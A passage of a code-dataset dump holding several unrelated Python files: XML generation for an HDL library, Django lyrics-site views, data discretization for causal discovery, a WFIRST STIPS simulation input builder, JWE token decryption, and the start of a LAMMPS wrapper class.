'name': Param.Name, 'size': str(Param.Size), 'type': Param.Type}\n AttrDict = {}\n for Name, Value in RefAttr.items():\n if Value is None:\n continue\n else:\n AttrDict[Name] = str(Value)\n\n XMLElmt = etree.SubElement(S, 'parameter', **AttrDict)\n Mapping[Param.Name] = Param.Name\n\n for PortName, Port 
in Mod.Ports.items():\n RefAttr = {'name': Port.Name, 'size': str(Port.Size), 'type': Port.Type, 'default': str(Port.GetValue())}\n AttrDict = {}\n for Name, Value in RefAttr.items():\n if Value is None:\n continue\n else:\n AttrDict[Name] = str(Value)\n\n XMLElmt = etree.SubElement(S, 'output' if Port.Direction == 'OUT' else 'input', **AttrDict)\n Mapping[Port.Name] = Port.Name\n\n ProvidedService = Infos['Name']\n Mod.AddProvServ(SName=Infos['Name'], SAlias=Infos['Name'], mapping=Mapping)\n for I in Interfaces:\n S.append(I.GetXMLElmt())\n\n import Service\n try:\n Serv = Service.Service(S)\n except:\n logging.error(\"[LibEditor.ProvidedServiceXml] Cannot instanciate service '{0}' from XML element.\".format(Infos['Name']))\n sys.exit(1)\n\n Mod.IdentifyServices([Serv])\n Serv.ModList.append(Mod)\n Serv.Interfaces = Interfaces\n return Serv\n\n\ndef ServiceXml(Serv):\n \"\"\"\n Generate XML for service provided as Serv.\n \"\"\"\n S = etree.Element('service', name=Serv.Name, type=Serv.Type, version=Serv.Version, category=Serv.Category)\n for ParamName, Param in Serv.Params.items():\n RefAttr = {'name': Param.Name, 'size': Param.Size, 'type': Param.Type, 'default': Param.Default}\n AttrDict = {}\n for Name, Value in RefAttr.items():\n if Value is None:\n continue\n else:\n AttrDict[Name] = str(Value)\n\n XMLElmt = etree.SubElement(S, 'parameter', **AttrDict)\n\n for PortName, Port in Serv.Ports.items():\n RefAttr = {'name': Port.Name, 'size': Port.Size, 'type': Port.Type, 'default': Port.Default}\n AttrDict = {}\n for Name, Value in RefAttr.items():\n if Value is None:\n continue\n else:\n AttrDict[Name] = str(Value)\n\n XMLElmt = etree.SubElement(S, 'output' if Port.Direction == 'OUT' else 'input', **AttrDict)\n\n for I in Serv.Interfaces:\n S.append(I.GetXMLElmt())\n\n return S\n\n\ndef InterfaceXml(Itf, Mapping={}):\n \"\"\"\n Generate XML for service provided in Itf.\n \"\"\"\n IElmt = etree.Element('interface', name=Itf.Name, direction=Itf.Direction, number='1')\n for D in Itf.DataList:\n if D.Name in Mapping:\n XMLElmt = etree.SubElement(IElmt, 'data', name=D.Name, target=Mapping[D.Name])\n else:\n if D.Name in Itf.Mapping:\n XMLElmt = etree.SubElement(IElmt, 'data', name=D.Name, target=Itf.Mapping[D.Name])\n else:\n XMLElmt = etree.SubElement(IElmt, 'data', name=D.Name, target=D.Name)\n\n for C in Itf.CtrlList:\n if C.Name in Mapping:\n XMLElmt = etree.SubElement(IElmt, 'ctrl', name=C.Name, target=Mapping[C.Name])\n else:\n if C.Name in Itf.Mapping:\n XMLElmt = etree.SubElement(IElmt, 'ctrl', name=C.Name, target=Itf.Mapping[C.Name])\n else:\n XMLElmt = etree.SubElement(IElmt, 'ctrl', name=C.Name, target=C.Name)\n\n if Itf.Protocol:\n for S in Itf.Protocol.IterSteps():\n S.AddXMLElmtTo(IElmt)\n\n else:\n logging.warning(\"No protocol specified for interface '{0}'\".format(Itf))\n return IElmt\n\n\ndef RemoveDuplicated(SignalList):\n \"\"\"\n Build a new list and fill it with a set of unique signals from argument list.\n \"\"\"\n SignalSet = []\n SignalNameSet = []\n for Sig in SignalList:\n if not SignalNameSet.count(Sig.Name):\n SignalSet.append(Sig)\n SignalNameSet.append(Sig.Name)\n\n return SignalSet","sub_path":"pycfiles/HdlLib-0.1.1.linux-x86_64.tar/LibEditor.cpython-35.py","file_name":"LibEditor.cpython-35.py","file_ext":"py","file_size_in_byte":12353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"123243676","text":"import sys\nimport numpy\nfrom collections import defaultdict\n\n#read the features in \n\ndef 
readFeatures(filename):\n word_list = []\n feature_list = []\n for line in open(filename):\n line = line.strip()\n if line == '':\n continue\n word,rest = line.split(' ',1)\n word_list.append(word)\n feature_list.append(list(map(float, rest.split())))\n return (word_list, numpy.array(feature_list))\n\ndef readGraph(filename,word_to_index):\n graph = numpy.zeros((len(word_to_index),len(word_to_index)),int)\n for line in open(filename):\n line = line.strip()\n if line == \"\":\n continue\n w1,w2,cost = line.split()\n #print w1,w2\n #raw_input()\n graph[word_to_index[w1]][word_to_index[w2]] = 1\n\n return graph\n \n","sub_path":"CODE/Util.py","file_name":"Util.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"610146511","text":"from django.core.exceptions import MultipleObjectsReturned\nfrom django.shortcuts import render\nfrom django.views.generic import TemplateView\nfrom django.utils.text import slugify\nfrom django.db.models.functions import Lower\nfrom .models import Artist, Song\nfrom .helpers import SLUG_TO_ARTIST, SLUG_TO_SONG_TITLE\n\nclass IndexView(TemplateView):\n\n template_name = 'mainsite/index.html'\n\n def get_context_data(self, **kwargs):\n context = super(IndexView, self).get_context_data(**kwargs)\n return context\n\nclass TranslationsView(TemplateView):\n template_name = 'mainsite/translations.html'\n\nclass LanguageView(TemplateView):\n template_name = 'mainsite/language.html'\n\nclass ArtView(TemplateView):\n template_name = 'mainsite/art.html'\n\nclass GardenView(TemplateView):\n template_name = 'mainsite/garden.html'\n\nclass LinksView(TemplateView):\n template_name = 'mainsite/links.html'\n\nclass ArtistsView(TemplateView):\n\n template_name = 'mainsite/artists.html'\n\n def get_context_data(self, **kwargs):\n context = super(ArtistsView, self).get_context_data(**kwargs)\n artists = Artist.objects.all().order_by(Lower('name_romaji'))\n\n artists_and_slugs = {}\n\n for artist in artists:\n # Convert to lower case and replace spaces with dashes so the artists' names can be used as slugs\n slug = slugify(artist.name_romaji)\n # Create a dictionary where artists' names are mapped to their slug counterparts\n # Example: {'Hamasaki Ayumi': 'hamasaki-ayumi'}\n artists_and_slugs[artist] = slug\n\n context['artists_and_slugs'] = artists_and_slugs\n\n return context\n\nclass SongListView(TemplateView):\n\n template_name = 'mainsite/songlist.html'\n\n def get_context_data(self, **kwargs):\n context = super(SongListView, self).get_context_data(**kwargs)\n # Convert the slug hyphen to a space to look it up in the db\n lookup_name = self.kwargs['slug'].replace('-', ' ')\n context['artist'] = lookup_name\n context['artist_slug'] = self.kwargs['slug']\n\n # Get all the song names for the artist\n songs = Song.objects.filter(artist__name_romaji__iexact=lookup_name).order_by(Lower('title_romaji'))\n\n # There are a few artists this trick won't work for. 
They are special and get their own constants dictionary.\n if not songs:\n lookup_name = SLUG_TO_ARTIST[self.kwargs['slug']]\n songs = Song.objects.filter(artist__name_romaji=lookup_name)\n\n songs_and_slugs = {}\n\n for song in songs:\n slug = slugify(song.title_romaji)\n songs_and_slugs[song] = slug\n\n context['songs_and_slugs'] = songs_and_slugs\n\n return context\n\nclass LyricsView(TemplateView):\n\n template_name = 'mainsite/lyrics.html'\n\n def get_context_data(self, **kwargs):\n context = super(LyricsView, self).get_context_data(**kwargs)\n artist_name = self.kwargs['artist_slug'].replace('-', ' ')\n song_title = self.kwargs['song_slug'].replace('-', ' ')\n\n # Prep the artist name in romaji and the song title for display\n if self.kwargs['artist_slug'] in SLUG_TO_ARTIST:\n context['artist'] = SLUG_TO_ARTIST[self.kwargs['artist_slug']]\n else:\n context['artist'] = artist_name.title()\n\n if self.kwargs['song_slug'] in SLUG_TO_SONG_TITLE:\n context['song_title'] = SLUG_TO_SONG_TITLE[self.kwargs['song_slug']]\n else:\n context['song_title'] = song_title.title()\n\n print(context['artist'])\n print(context['song_title'])\n\n lyrics_query = Song.objects.filter(title_romaji__iexact=context['song_title']).filter(artist__name_romaji__iexact=context['artist'])\n lyrics = lyrics_query[0]\n\n context['lyrics'] = lyrics\n context['artist_slug'] = self.kwargs['artist_slug']\n\n return context\n\n","sub_path":"mainsite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"400148568","text":"# Contributors: Siddharth Jain, Aayush Makharia, Vineet Malik, Sourav Suman, Ayush Chauhan, Gaurav Sinha\n# Owned by: Adobe Corporation\nimport pandas as pd\nfrom feature_engine import discretisers as dsc\nfrom sklearn.preprocessing import KBinsDiscretizer\nimport sys\n# sys.path.append('./libraries/')\nfrom libraries.caim_test import CAIMD\nimport numpy as np\nfrom python.ci_tests import fast_conditional_ind_test as FCIT\nfrom multiprocessing import Pool\nfrom python.bnutils import one_hot_encoder\nfrom sklearn.preprocessing import StandardScaler\n\n\n# Implements multiple discretization techniques for continuous variables\n\n\nclass Decision_Tree_Discretizer:\n\n \"\"\"Discretizes a continuous variable using Decision tree classifier\n Args:\n score: score to be considered for discretization\n **kwargs: dictionary of parameters for DecisionTreeDiscretiser\n\n kwargs format with default values: {'cv': 10, 'regression': False, 'max_depth': [1,2,3], 'max_samples_leaf': [10, 4]}\n \"\"\"\n def __init__(self, score='accuracy', **kwargs):\n self.cv = kwargs.get('cv', 10)\n self.scoring = score\n self.regression = kwargs.get('regression', False)\n self.param_grid = {\n 'max_depth': kwargs.get('max_depth', [1, 2, 3]),\n 'min_samples_leaf': kwargs.get('max_samples_leaf', [10, 4])\n }\n\n def fit(self, data, node, target, **kwargs):\n self.node = node\n self.disc = dsc.DecisionTreeDiscretiser(cv=self.cv, scoring=self.scoring, variables=[node], regression=False, param_grid=self.param_grid)\n self.disc.fit(data[[node, target]], data[target])\n print(self.disc.scores_dict_[node])\n return self, self.disc.scores_dict_[node]\n\n def transform(self, data):\n print(data)\n return self.disc.transform(data[[data.columns[0], data.columns[1]]])[self.node]\n\n\ndef unsupervised_discretization(df, node_list, bins, discretization_type):\n \"\"\"Bins continuous data into intervals.\n Args:\n df : pandas 
dataframe object with mixed data\n node_list : list of continuous nodes\n bins : number of intervals\n discretization_type : takes one of the following values -\n uniform : generates bins of equal width\n quantile : generates bins of equal frequency\n kmeans : generates bins using the k-means algorithm\n Returns:\n dataframe with discretized columns appended in df\n \"\"\"\n discretizer = None\n if discretization_type == 'uniform':\n discretizer = KBinsDiscretizer(n_bins=bins, encode='ordinal', strategy='uniform')\n elif discretization_type == 'quantile':\n discretizer = KBinsDiscretizer(n_bins=bins, encode='ordinal', strategy='quantile')\n elif discretization_type == 'kmeans':\n discretizer = KBinsDiscretizer(n_bins=bins, encode='ordinal', strategy='kmeans')\n else:\n raise NotImplementedError(\"Invalid discretization type\")\n df[node_list] = discretizer.fit_transform(df[node_list])\n return df\n\n\ndef get_laim(sp, scheme, xi, y):\n \"\"\" LAIM score for discretization\n Args:\n sp : indexes of x corresponding to each bin\n scheme : set of thresholds for the discretized bins\n xi : attribute being discretized\n y : target to be used for discretization of xi\n Returns:\n LAIM score\n \"\"\"\n sp.insert(0, 0)\n sp.append(xi.shape[0])\n n = len(sp) - 1\n\n M = 0\n laim = 0\n for r in range(n):\n init = sp[r]\n fin = sp[r + 1]\n val, counts = np.unique(y[init:fin], return_counts=True)\n if val[0] == -1e10:\n val = val[1:]\n counts = counts[1:]\n\n Mr = counts.sum()\n maxr = counts.max()\n laim += (maxr / Mr) * maxr\n M += Mr\n\n laim /= n * M\n return laim\n\n\ndef get_ameva(sp, scheme, xi, y):\n \"\"\" Ameva score for discretization\n Args:\n sp : indexes of x corresponding to each bin\n scheme : set of thresholds for the discretized bins\n xi : attribute being discretized\n y : target to be used for discretization of xi\n Returns:\n Ameva score\n \"\"\"\n sp.insert(0, 0)\n sp.append(xi.shape[0])\n n = len(sp) - 1\n\n label, label_counts = np.unique(y, return_counts=True)\n M_label = dict()\n for j in range(len(label)):\n M_label[label[j]] = label_counts[j]\n\n M = 0\n ameva = 0\n for r in range(n):\n init = sp[r]\n fin = sp[r + 1]\n val, counts = np.unique(y[init:fin], return_counts=True)\n\n Mr = counts.sum()\n for j in range(len(val)):\n ameva += (counts[j] / Mr) * (counts[j] / M_label[val[j]])\n M += Mr\n\n ameva = (M * (ameva - 1)) / (n * (len(label) - 1))\n return ameva\n\n\ndef get_mlameva(sp, scheme, xi, y):\n \"\"\" Multi Label Ameva score for discretization\n Args:\n sp : indexes of x corresponding to each bin\n scheme : set of thresholds for the discretized bins\n xi : attribute being discretized\n y : target to be used for discretization of xi\n Returns:\n MLAmeva score\n \"\"\"\n sp.insert(0, 0)\n sp.append(xi.shape[0])\n n = len(sp) - 1\n\n label, label_counts = np.unique(y, return_counts=True)\n if label[0] == -1e10:\n label = label[1:]\n label_counts = label_counts[1:]\n M_label = dict()\n for j in range(len(label)):\n M_label[label[j]] = label_counts[j]\n\n M = 0\n mlameva = 0\n for r in range(n):\n init = sp[r]\n fin = sp[r + 1]\n val, counts = np.unique(y[init:fin], return_counts=True)\n if val[0] == -1e10:\n val = val[1:]\n counts = counts[1:]\n\n Mr = counts.sum()\n for j in range(len(val)):\n mlameva += (counts[j] / Mr) * (counts[j] / M_label[val[j]])\n M += Mr\n\n mlameva = (M * (mlameva - 1)) / (n * (len(label) - 1))\n return mlameva\n\ndef parallel(args):\n if FCIT(args[0], args[3], args[4], args[5], nodes=args[1], onehot_dict=args[2]) > args[6]:\n 
return args[4]\n return -1\n\nclass Data_Driven_Discretizer:\n \"\"\" Used to discretize a set of variables using the inter-dependence information available before hand.\n Args:\n data : data to be discretized\n skel : the inter-dependence knowledge available before-hand\n nodes : a dict containing extra information about the variables\n max_process : max no of processes to create during parallelization\n method : core discretization technique to be used\n Returns:\n discretized data\n \"\"\"\n def __init__(self, data, skel, cond_check_skel, nodes, alpha=0.1, max_process=10, discretizer=CAIMD, method=get_mlameva):\n self.data = data\n self.alpha = alpha\n self.max_process = max_process\n self.skel = skel\n self.cond_check_skel = cond_check_skel\n self.nodes = nodes\n self.disc_data = data.copy()\n self.cont_list = [node[0] for node in self.nodes if node[1]['type'] == 'cont']\n self.disc_list = [node[0] for node in self.nodes if node[1]['type'] == 'disc']\n self.n_samples = self.data.shape[0]\n self.onehot_dict = {node[0]: one_hot_encoder(data[:][node[0]].to_numpy()) for node in self.nodes if node[1]['type'] == 'disc'}\n self.discretizer = discretizer(score=method, max_process=max_process)\n\n \n def cond_check(self, node, neigh, neighbors, scheme):\n \"\"\"Returns the no of nodes that have either changed to independent or dependent on \"node\" due to discretization\"\"\"\n pool = Pool(self.max_process)\n PCS = set(self.cont_list + self.disc_list)-set([node])\n data_disc = self.data.copy()\n\n data_disc[node] = scheme.transform(self.data[[node, neigh]])\n data_disc = data_disc.replace({node: pd.unique(data_disc[node])}, {node: list(range(pd.unique(data_disc[node]).shape[0]))})\n self.onehot_dict[node] = one_hot_encoder(data_disc[node].to_numpy())\n\n args = [(self.data,self.nodes,self.onehot_dict,node, neigh, [],self.alpha) for neigh in PCS]\n PCS = PCS - set(pool.map(parallel, args))\n args = [(self.data,self.nodes,self.onehot_dict,node, X, [Z],self.alpha) for X in PCS for Z in PCS-set([X])]\n new_neighbors = PCS-set(pool.map(parallel, args))\n\n pool.close()\n pool.join()\n\n return len(new_neighbors - set(neighbors)) + len(set(neighbors) - new_neighbors)\n\n def discretize(self):\n \"\"\"Entry point into the algorithm\"\"\"\n cont_queue = []\n for node in self.cont_list:\n if len(list(self.skel.neighbors(node))) != 0:\n ratio = len(set(self.skel.neighbors(node))-set(self.cont_list))/len(list(self.skel.neighbors(node)))\n else:\n ratio = 0\n cont_queue.append((ratio, len(list(self.skel.neighbors(node))), node))\n cont_queue = sorted(cont_queue, key=lambda x: (-x[0], -x[1]))\n\n while cont_queue:\n (ratio, _, node) = cont_queue.pop(0)\n best_score = -1\n best_scheme = None\n main_list = []\n if ratio == 0:\n iter_set = set(self.disc_list)\n else:\n iter_set = set(self.skel.neighbors(node))-set(self.cont_list)\n for neigh in iter_set:\n scheme, score = self.discretizer.fit(self.data[[node, neigh]], node, neigh)\n main_list.append((self.cond_check(node, neigh, list(self.cond_check_skel[node]), scheme), score, scheme, neigh))\n (best_shd, best_score, best_scheme, best_neigh) = sorted(main_list, key=lambda i: (i[0], -i[1]))[0]\n\n self.data[node] = best_scheme.transform(self.data[[node, best_neigh]])\n self.data = self.data.replace({node: pd.unique(self.data[node])}, {node: list(range(pd.unique(self.data[node]).shape[0]))})\n self.cont_list.remove(node)\n self.disc_list.append(node)\n for i in range(len(cont_queue)):\n if cont_queue[i][2] in set(self.skel.neighbors(node)):\n cont_queue[i] = 
(cont_queue[i][0]+1/len(list(self.skel.neighbors(cont_queue[i][2]))), cont_queue[i][1], cont_queue[i][2])\n cont_queue = sorted(cont_queue, key=lambda x: (-x[0], -x[1]))\n\n return self.data\n\n\ndef PCA_discretizer(data, skel, PCS_neigh, nodes, alpha, max_process, threshold = 90):\n cont_nodes = [node[0] for node in nodes if node[1]['type'] == 'cont']\n data_cont = data.loc[:, cont_nodes].values\n data_transformed = StandardScaler().fit_transform(data_cont)","sub_path":"LIB/build/lib/python/discretize.py","file_name":"discretize.py","file_ext":"py","file_size_in_byte":10547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"124744280","text":"#! /usr/bin/env python\n'''\nWFIRST Infrared Nearby Galaxies Test Image Product Simulator\nProduces input files for the WFIRST STIPS simulator\n'''\nimport time\nimport numpy as np\nfrom astropy import wcs\nfrom astropy.io import fits, ascii\nfrom astropy.table import Table\n\nclass WingTips:\n '''\n Initialize WingTips object\n '''\n def __init__(self,infile=[],center=[0,0]):\n if len(infile)==0:\n self.tab = np.array([])\n else:\n if isinstance(infile,str):\n infile = [infile]\n self.tab = WingTips.read_stips(infile[0])\n if len(infile)>1:\n for i in range(1,len(infile)):\n _tab = WingTips.read_stips(infile[i])\n self.tab = np.vstack((self.tab,_tab))\n center = WingTips.get_center(self.tab[:,0],self.tab[:,1])\n self.center = center\n self.n = self.tab.shape[0]\n self.infile = infile\n return None\n\n\n ''' Strip coordinates from WingTips object '''\n def strip_radec(self,hasID=False):\n _i = int(hasID)\n self.tab = np.delete(self.tab,[_i,_i+1],1)\n return None\n\n \n ''' Attach given RA-DEC to WingTips object'''\n def attach_radec(self,radec,hasID=False):\n if self.n != radec.shape[0]:\n raise ValueError('Number of RA-DEC does not match sources')\n _i = int(hasID)\n self.tab = np.insert(self.tab,_i,radec.T,1)\n self.center = WingTips.get_center(radec[:,0+_i],radec[:,1+_i])\n return None\n\n \n ''' Replace RA-DEC of WingTips object '''\n def replace_radec(self,radec,hasID=False):\n self.strip_radec(hasID)\n self.attach_radec(radec,hasID)\n return None\n\n \n ''' \n Return random RA-DEC for given image or WingTips object\n Optionally, specify center and image size desired\n '''\n def random_radec_for(self,other,shape=(4096,4096),sample=False,n=0,hasID=False):\n _i = int(hasID)\n try:\n if other.endswith('.fits'):\n return WingTips.random_radec(self.n,imfile=other)\n except AttributeError:\n if not sample:\n return WingTips.random_radec(self.n,center=other.center)\n elif not bool(n):\n return WingTips.sample_radec(n=self.n,radec1=False,radec2=other.tab[:,_i:_i+1])\n else:\n return WingTips.sample_radec(n=n,radec1=self.tab[:,_i:_i+1],radec2=other.tab[:,_i:_i+1])\n\n\n ''' Merge two WingTips objects '''\n def merge_with(self,other,hasRADEC=True,hasID=False):\n if self.tab.shape[1]!=other.tab.shape[1]:\n raise ValueError('Number of columns does not match',self.tab.shape[1],other.tab.shape[1])\n self.tab = np.vstack((self.tab,other.tab))\n self.n = self.tab.shape[0]\n self.infile.append(other.infile)\n _i = int(hasID)\n if hasRADEC:\n self.center = WingTips.get_center(self.tab[:,0+_i],self.tab[:,1+_i])\n return None\n\n \n ''' Convert flux to surface brightness for sersic profile galaxies '''\n def flux_to_Sb(self,hasRADEC=True,hasID=False):\n _i = int(hasID)\n if hasRADEC:\n _i = _i+2\n _f = self.tab[:,_i].astype(float)\n _r = self.tab[:,_i+3].astype(float)\n _a = self.tab[:,_i+5].astype(float)\n _s = 
(0.5*_f) / (np.pi * _r**2 * _a) \n self.tab = np.delete(self.tab,_i,1)\n self.tab = np.insert(self.tab,_i,_s.T,1)\n return None\n\n\n ''' Write out a STIPS input file '''\n def write_stips(self,outfile='temp.txt',hasID=False,hasCmnt=False,saveID=False,ipac=False):\n _tab = WingTips.get_tabular(self.tab,hasID,hasCmnt,saveID)\n _nms = ('id', 'ra', 'dec', 'flux', 'type', 'n', 're', 'phi', 'ratio', 'notes')\n _fmt = ('%10d','%15.7f','%15.7f','%15.7f','%8s','%10.3f','%15.7f','%15.7f','%15.7f','%8s')\n _t = Table(_tab, names=_nms)\n if ipac:\n ascii.write(_t, outfile, format='ipac', formats=dict(zip(_nms,_fmt)))\n else:\n ascii.write(_t, outfile, format='fixed_width', delimiter='', formats=dict(zip(_nms,_fmt)))\n return print('Wrote out %s \\n' % outfile)\n\n \n \n ''' Build a WingTips class object from scratch '''\n @staticmethod\n def from_scratch(flux, ra=[], dec=[], center=[], ID=[], Type=[], n=[], re=[], phi=[], ratio=[], notes=[], outfile=''):\n _temp = WingTips()\n _temp.n = len(flux)\n _temp.infile = ['fromScratch']\n\n if len(center)>0:\n _temp.center = center\n if len(ra)==0:\n radec = _temp.random_radec_for(_temp)\n ra,dec = radec[:,0],radec[:,1]\n elif ((len(ra)==len(dec)) and (len(ra)>0)):\n _temp.center = WingTips.get_center(np.array(ra),np.array(dec))\n else:\n raise ValueError('Provide valid coordinate or center')\n\n if ((len(Type)==0) or (Type == 'point') or (Type == 'sersic')):\n if ((len(Type)==0) or (Type == 'point')):\n Type = np.repeat(np.array(['point']),len(flux))\n _ones = np.ones_like(flux)\n n, re, phi, ratio = _ones, _ones, _ones, _ones\n elif (Type=='sersic'):\n Type = np.repeat(np.array(['sersic']),len(flux))\n elif (len(Type)==len(flux)):\n Type = np.array(Type)\n\n _tab = np.array([ra,dec,flux,Type,n,re,phi,ratio]).T\n\n if (len(ID)==len(flux)):\n _tab=np.hstack((np.array(ID,ndmin=2).T,_tab))\n if (len(notes)==len(flux)):\n _tab=np.hstack((_tab,np.array(notes,ndmin=2).T))\n\n _temp.tab = np.array(_tab)\n\n\n if outfile == '':\n return _temp\n else:\n _temp.write_stips(outfile,hasID=bool(ID),hasCmnt=bool(notes),saveID=bool(ID))\n return None\n\n \n ''' \n Read in a STIPS input file in ascii format and \n return corresponding NumPy array\n '''\n @staticmethod\n def read_stips(infile,getRADEC=True,getID=False,getCmnt=False):\n _tab = []\n _infile = ascii.read(infile)\n print('\\nRead in %s \\n' % infile)\n\n if getID:\n _tab.append(_infile['id'])\n if getRADEC:\n _tab.append(_infile['ra'])\n _tab.append(_infile['dec'])\n\n _tab.append(_infile['flux'])\n _tab.append(_infile['type'])\n _tab.append(_infile['n'])\n _tab.append(_infile['re'])\n _tab.append(_infile['phi'])\n _tab.append(_infile['ratio'])\n\n if getCmnt:\n _tab.append(_infile['comment'])\n\n return np.array(_tab).T\n\n\n ''' Return tabular lists for STIPS input file columns '''\n @staticmethod\n def get_tabular(_tab,hasID=False,hasCmnt=False,saveID=False):\n _i = int(hasID)\n if not saveID:\n _n = _tab.shape[0]\n _ID = np.array(np.linspace(1,_n,_n),ndmin=2).T\n _tab = np.hstack((_ID,_tab[:,_i:]))\n if not hasCmnt:\n _cmnt = np.array(np.repeat(np.array(['comment']),_tab.shape[0],),ndmin=2).T\n _tab = np.hstack((_tab,_cmnt))\n return [_tab[:,0].astype(float), _tab[:,1].astype(float), _tab[:,2].astype(float), \\\n _tab[:,3].astype(float), _tab[:,4], _tab[:,5].astype(float), \\\n _tab[:,6].astype(float), _tab[:,7].astype(float), \\\n _tab[:,8].astype(float), _tab[:,9]]\n\n\n ''' Build WCS coordinate system from scratch '''\n @staticmethod\n def 
create_wcs(centers=[0,0],crpix=[2048,2048],cdelt=[-0.11/3600,0.11/3600],cunit=['deg','deg'],\\\n ctype=['RA---TAN','DEC--TAN'],lonpole=180,latpole=24.333335,\\\n equinox=2000.0,radesys='ICRS'):\n _w = wcs.WCS()\n _w.wcs.cdelt = cdelt\n _w.wcs.crpix = crpix\n _w.wcs.crval = centers\n _w.wcs.cunit = cunit\n _w.wcs.ctype = ctype\n _w.wcs.lonpole = lonpole\n _w.wcs.latpole = latpole\n _w.wcs.radesys = radesys\n _w.wcs.equinox = equinox\n return _w\n\n\n ''' Return coordinate system for given image file'''\n @staticmethod\n def read_wcs(imfile):\n print('Getting coordinates from %s \\n' % imfile)\n return wcs.WCS(fits.open(imfile)[1].header)\n\n\n ''' Return 'n' random radec for given image file or coordinate list '''\n @staticmethod\n def random_radec(n=10,center=[0,0],shape=(4096,4096),imfile=''):\n _xy = np.random.rand(n,2)*shape\n if imfile != '':\n _w = WingTips.read_wcs(imfile)\n else:\n _w = WingTips.create_wcs(center)\n return _w.wcs_pix2world(_xy,1)\n\n \n '''\n Return a random sample of 'n' RA-DEC coordinates from 'radec2'\n If radec1 is specified, then replace 'n' random coordinates\n in 'radec1' with random sample from 'radec2'\n '''\n @staticmethod\n def sample_radec(n=10,radec1=False,radec2=[]):\n in2 = np.random.randint(0,radec2.shape[0],n)\n if radec1 is False:\n return radec2[in2,:]\n else:\n in1 = np.random.randint(0,radec1.shape[0],n)\n radec1[in1,:] = radec2[in2,:]\n return radec1\n \n\n ''' Return mean of RA-DEC positions given '''\n @staticmethod\n def get_center(ra,dec):\n return [ra.astype(float).mean(),dec.astype(float).mean()]\n\n \n '''\n Convert mags to WFI instrument counts\n Default is apparent AB mags\n Specify 'dist' if absolute mags\n Specify AB_Vega if Vega mags\n '''\n @staticmethod\n def get_counts(mag,ZP,dist=0,AB_Vega=0):\n if bool(dist):\n print('\\nDistance is d = %4.2f Mpc\\n' % dist)\n u = 25+5*np.log10(dist)\n mag = mag+u\n if bool(AB_Vega):\n mag = mag + AB_Vega\n return 10**((mag-ZP)/(-2.5))\n","sub_path":"wingtips.py","file_name":"wingtips.py","file_ext":"py","file_size_in_byte":9714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"70351810","text":"import base64\n\nfrom cryptography.hazmat.backends.openssl.backend import backend\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import padding\nfrom cryptography.hazmat.primitives.ciphers import Cipher\nfrom cryptography.hazmat.primitives.ciphers import algorithms\nfrom cryptography.hazmat.primitives.ciphers import modes\n\nfrom app.utilities import strings\n\n\nclass JWEDecryptor(object):\n\n @staticmethod\n def _decrypt_cipher_text(cipher_text, iv, key, tag, jwe_protected_header):\n cipher = Cipher(algorithms.AES(key), modes.GCM(iv, tag), backend=backend)\n decryptor = cipher.decryptor()\n decryptor.authenticate_additional_data(jwe_protected_header.encode())\n decrypted_token = decryptor.update(cipher_text) + decryptor.finalize()\n return decrypted_token\n\n @staticmethod\n def _base64_decode(text):\n # if the text is not a multiple of 4 pad with trailing =\n # some base64 libraries don't pad data but Python is strict\n # and will throw an incorrect padding error if we don't do this\n if len(text) % 4 != 0:\n while len(text) % 4 != 0:\n text += \"=\"\n return base64.urlsafe_b64decode(text)\n\n\nclass JWERSAOAEPDecryptor(JWEDecryptor):\n\n def __init__(self, private_key, password):\n\n self.private_key = serialization.load_pem_private_key(\n 
private_key.encode(),\n password=password.encode(),\n backend=backend,\n )\n\n def decrypt(self, token):\n tokens = token.split('.')\n if len(tokens) != 5:\n raise ValueError(\"Incorrect size\")\n jwe_protected_header = tokens[0]\n encrypted_key = tokens[1]\n encoded_iv = tokens[2]\n encoded_cipher_text = tokens[3]\n encoded_tag = tokens[4]\n\n decrypted_key = self._decrypt_key(encrypted_key)\n iv = self._base64_decode(encoded_iv)\n tag = self._base64_decode(encoded_tag)\n cipher_text = self._base64_decode(encoded_cipher_text)\n\n signed_token = self._decrypt_cipher_text(cipher_text, iv, decrypted_key, tag, jwe_protected_header)\n return signed_token\n\n def _decrypt_key(self, encrypted_key):\n decoded_key = self._base64_decode(encrypted_key)\n key = self.private_key.decrypt(decoded_key, padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA1()), algorithm=hashes.SHA1(), label=None))\n return key\n\n\nclass JWEDirDecrypter(JWEDecryptor):\n\n def decrypt(self, token, cek):\n tokens = token.split('.')\n if len(tokens) != 5:\n raise ValueError(\"Incorrect size\")\n jwe_protected_header = tokens[0]\n # encrypted_key is not used, would be tokens[1]\n encoded_iv = tokens[2]\n encoded_cipher_text = tokens[3]\n encoded_tag = tokens[4]\n\n iv = self._base64_decode(encoded_iv)\n tag = self._base64_decode(encoded_tag)\n cipher_text = self._base64_decode(encoded_cipher_text)\n\n decrypted_text = self._decrypt_cipher_text(cipher_text, iv, cek, tag, jwe_protected_header)\n decoded_text = self._base64_decode(strings.to_str(decrypted_text))\n return strings.to_str(decoded_text)\n","sub_path":"app/cryptography/jwe_decryption.py","file_name":"jwe_decryption.py","file_ext":"py","file_size_in_byte":3258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"258059248","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 10 12:28:16 2019\n\nCode is split into the main class (Lammps) and examples.\n\n@author: Pat Taylor (pt409)\n\"\"\"\n\nimport subprocess as sp\nimport os\nimport sys\nimport numpy as np\nfrom random import sample\nfrom mendeleev import element\n\n################################# CLASS #######################################\n\nclass Lammps :\n \n # classmethod to redefine these is supplied later\n lammps_cmd = \"mpirun lmp_mpi\"\n \n def __init__(self,input_file=\"\",data_file=None) :\n self.input_file = input_file\n self.data_file = data_file\n self.log_file = input_file.replace(\".in\",\".log\")\n # When writing new functions be very careful about whether this should be prepended to the .in file, .log file, etc\n self.work_dir = 